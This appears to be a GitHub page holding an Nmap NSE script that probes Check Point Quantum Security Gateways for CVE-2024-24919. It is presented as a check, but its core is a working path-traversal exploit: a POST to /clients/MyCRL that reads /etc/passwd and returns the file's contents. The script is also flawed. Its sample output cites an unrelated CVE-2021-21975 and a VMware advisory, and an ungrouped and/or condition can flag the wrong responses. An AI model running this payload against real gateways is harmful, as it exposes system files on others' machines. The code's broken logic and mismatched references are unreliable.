-
Notifications
You must be signed in to change notification settings - Fork 2
/
cve-2024-24919.nse
102 lines (91 loc) · 3.93 KB
/
cve-2024-24919.nse
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
description = [[
CVE-2024-24919 Vulnerability - Check
Este script de Nmap busca verificar la vulnerabilidad CVE-2024-24919 en la siguiente ruta
"/clients/MyCRL" mediante una solicitud POST e interpretando la
respuesta HTTP 200. Si se encuentran las palabras "admin, root o sshd"
significa que Check Point es Vulnerable.
References:
https://nvd.nist.gov/vuln/detail/CVE-2024-24919
]]
---
-- @usage
-- nmap -p443 --script CVE-2024-24919.nse <target>
-- @output
-- PORT STATE SERVICE
-- 443/tcp open https
-- | CVE-2024-24919:
-- | VULNERABLE:
-- | Check Point Quantum Security Gateways Information Disclosure Vulnerability
-- | State: VULNERABLE (Exploitable)
-- | IDs: CVE:CVE-2024-24919
-- | Risk factor: HIGH CVSS: 8.6
-- | Check Point Quantum Security Gateways contain an unspecified information disclosure vulnerability. The vulnerability potentially allows an attacker to access information on Gateways connected to the internet, with IPSec
-- | VPN, Remote Access VPN or Mobile Access enabled. This issue affects several prod
-- | Disclosure date: 2024-05-30
-- | References:
-- | https://app.howlermonkey.io/vulnerabilities/CVE-2021-21975
-- | https://www.vmware.com/security/advisories/VMSA-2021-0004.html
-- |_ Respuesta HTTP:
author = "Edgar Salazar <edgar.salazar@guayoyo.io>"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"vuln", "exploit"}
local shortport = require "shortport"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"
portrule = shortport.http
action = function(host, port)
local vuln = {
title = "Check Point Quantum Security Gateways Information Disclosure Vulnerability",
state = vulns.STATE.NOT_VULN,
risk_factor = "HIGH",
scores = {
CVSS = "8.6",
},
IDS = { CVE = 'CVE-2024-24919' },
description = [[
Check Point Quantum Security Gateways contain an unspecified information disclosure vulnerability. The vulnerability potentially allows an attacker to access information on Gateways connected to the internet,
with IPSec VPN, Remote Access VPN or Mobile Access enabled. This issue affects several prod
]],
references = {
'https://www.cvedetails.com/cve/CVE-2024-24919/',
'https://support.checkpoint.com/results/sk/sk182336'
},
dates = {
disclosure = {year = '2024', month = '05', day = '30'},
},
check_results = {
},
exploit_results = {
},
}
local report = vulns.Report:new(SCRIPT_NAME, host, port)
local uri = "/clients/MyCRL"
local PAYLOAD = "aCSHELL/../../../../../../../../../../../etc/passwd"
local options = {header={}}
options["header"]["Host"] = 'action'
options["header"]["Content-Type"] = 'application/x-www-form-urlencoded'
options["header"]["User-Agent"] = 'Guayoyo - Mozilla/5.0 (compatible; vCenter)'
vuln.state = vulns.STATE.NOT_VULN
local response = http.post(host, port, uri, options, nil, PAYLOAD)
if response.status == 200 and
string.find(response.body, "admin") or
string.find(response.body, "root") or
string.find(response.body, "sshd") then
vuln.state = vulns.STATE.EXPLOIT
vuln.exploit_results = response.body
else
uri = "/clients/MyCRL"
options = {header={}}
options["header"]["Host"] = 'action'
options["header"]["Accept"] = 'text/html,application/xhtml+xml,application/xml'
options["header"]["User-Agent"] = 'Guayoyo - Mozilla/5.0 (compatible; Check Point)'
response = http.get(host, port, uri, options)
if response.status == 200 and (
string.find(response.header, "Server: Check Point SVN foundation")) then
vuln.state = vulns.STATE.LIKELY_VULN
end
end
return report:make_output (vuln)
end